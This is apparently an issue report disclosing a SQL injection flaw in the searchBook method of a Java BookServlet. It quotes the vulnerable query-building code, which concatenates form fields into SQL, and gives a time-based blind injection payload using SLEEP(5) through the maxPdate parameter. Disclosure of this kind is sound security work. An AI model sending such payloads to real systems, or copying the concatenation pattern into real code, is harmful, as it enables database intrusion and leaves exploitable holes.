There is a SQL injection vulnerability in the searchBook method of the BookServlet #10
Description
Code that generates SQL injections:
String baseSql = "from book where price>=" + minprice; //如果前端表单传入minprice为空,则minprice=0为异常处理的结果
String sql = baseSql;
if (maxprice != 0) sql = baseSql + " and price<=" + maxprice; //如果前端表单maxprice输入不为空
if (!minpdate.equals("")) sql += " and pdate>= '" + minpdate + "'";
if (!maxpdate.equals("")) sql += " and pdate<= '" + maxpdate + "'";
if (cateId != 0) sql += " and cateId=" + cateId;
if (!name.equals("")) {
String keywords = "";
for (int i = 0; i < name.length(); i++) //将关键字分解成一个一个字进行模糊查询
keywords += "%" + name.charAt(i);
sql += " and name like " + "'" + keywords + "%'";
}
String countSql = "select count(*) " + sql; //查询满足条件的记录数
sql = "select * " + sql + " limit ?,?";
System.out.println(sql);
System.out.println(countSql);
payload:
type=search&bookname=aaaaa&cateId=0&minprice=&maxprice=&minPdate=&maxPdate=2024-04-15' AND (SELECT 5405 FROM (SELECT(SLEEP(5)))ITKj) AND 'GJzT'='GJzT
